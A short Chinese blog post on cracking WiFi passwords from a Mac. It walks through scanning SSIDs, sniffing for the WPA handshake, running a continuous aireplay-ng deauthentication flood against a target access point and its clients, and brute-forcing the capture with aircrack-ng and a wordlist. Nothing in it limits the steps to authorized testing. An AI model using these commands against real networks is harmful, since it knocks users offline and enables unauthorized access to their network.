Geekby's Blog
文章 标签 分类 关于
Geekby's Blog

目录

WIFI 密码破解

 收录于 渗透测试
   约 84 字   预计阅读 1 分钟 

WIFI 密码破解

1 原理

通过发送断开连接的请求,使得所有连接了目标 WIFI 的设备全都断开连接,设备会重新连接,然后监听其中一个设备与 WIFI 建立连接时的握手包,其中包含了密码的密文,然后使用 aircrack-ng 进行离线破解。

2 步骤

2.1 扫描附近 SSID

1
2
3
4

执行命令获取附近 SSID
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -s
设置快捷键后变成:
airport -s

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190201144911.png-water_print

2.2 抓握手包

信息
mac 下需要先安装 aircrack-ng brew install aircrack-ng
1

airport en0 sniff 信道

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190201150107.png-water_print

等待一段时间后,CTRL+C 结束监听

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20190201150107.png-water_print

检测这个包里是否抓到里握手包(是否包含密码信息):

1

sudo aircrack-ng /tmp/airportSniffTRT4xj.cap

注:因为同一个信道可能并不止一个 WIFI 信号在使用,所以会探测多个 WIFI

2.3 DeAuth 泛洪攻击

1
2

sudo aireplay-ng -0 0 -a WIFI物理地址 -c 用户设备物理地址 wlan0mon
参数 -0 3 表示发送3次,-0 0 表示持续发送。 不加 -c 参数表示断开所有客户端的连接

2.4 破解握手密码包

1

sudo aircrack-ng /tmp/airportSniffTRT4xj.cap -w 字典路径
更新于 2019-02-01
 渗透测试WIFI
返回 | 主页